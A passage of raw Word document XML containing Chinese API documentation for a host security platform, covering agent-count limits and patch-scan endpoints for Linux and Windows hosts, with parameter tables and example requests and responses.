      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF6B04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66192B67"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2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6EA2FC09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DABDB81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果单次修改agent数超过5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4510D5FB"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the number of agents is too large, please keep it within 5000"</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31EDCA3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果30分钟内多次修改agent数量总和超过5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7447A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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the maximum number of executions in 30 minutes is 5000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED7BB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc115166158"/>
      <w:bookmarkStart w:id="168" w:name="风险发现"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>风险发现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="16AF7E69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc115166159"/>
      <w:bookmarkStart w:id="170" w:name="安全补丁"/>
      <w:r>
        <w:t>安全补丁</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="659149B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供所有的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和windows补丁的检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C543C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc115166160"/>
      <w:bookmarkStart w:id="172" w:name="补丁扫描-1"/>
      <w:r>
        <w:t>补丁扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="57C5E469" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD8760C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54358565" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244B6822"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BC669E" w14:paraId="644163B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BE69E2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594EABD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A23373D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="740AFAB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DB37451" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B9A916F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33CA2D23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E325B13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CDCCD0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>组范围</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="148C30F0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48822649" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="440396B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58B995F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62B9FF83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40DB76BB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="613E33B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A51D23D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFB25D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E734A6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E66C724" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F281E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6E3BE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FC1317" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4974FFA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28802FD0"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t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7145B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0294C014"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1F996AA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9D42AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>一个账号同时只能一个任务运行，因此调用这个接口前，应该先调用4.1.2查询状态接口，如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>satus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>非Running，则可以创建任务，如果创建成功，则正常返回， 如果创建失败， 则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1354DE"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1D81558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FAB8BB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="231B8E66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7332AB67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E69224" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="640FCA36" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BA1B65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB9A9E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20B74C26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F109C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CCD740D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc115166161"/>
      <w:bookmarkStart w:id="174" w:name="查询补丁扫描执行状态"/>
      <w:bookmarkEnd w:id="172"/>
      <w:r>
        <w:t>查询补丁扫描执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w14:paraId="00E9E8EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899632D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1F7E8D18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7853B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BF10C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF3401D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id":""//当前job的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 如果为null, 则当前没有job执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Running|Success|Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF7D9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB2CB26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果id为null，则说明此前从未有过job执行，status为Running。如果id不为null， 则id为最近一次job执行的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, status为最近这次job执行的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2845D9"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4422"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="23A8222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00C75E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59138092" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C384B96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B89E91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20E012B8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04330737" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34A882AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA9FB71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="771FFAA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID，如果为null，则当前没有job执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="11701A99" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F3AD0EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E6DAA6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702FF661" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B0BDED2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
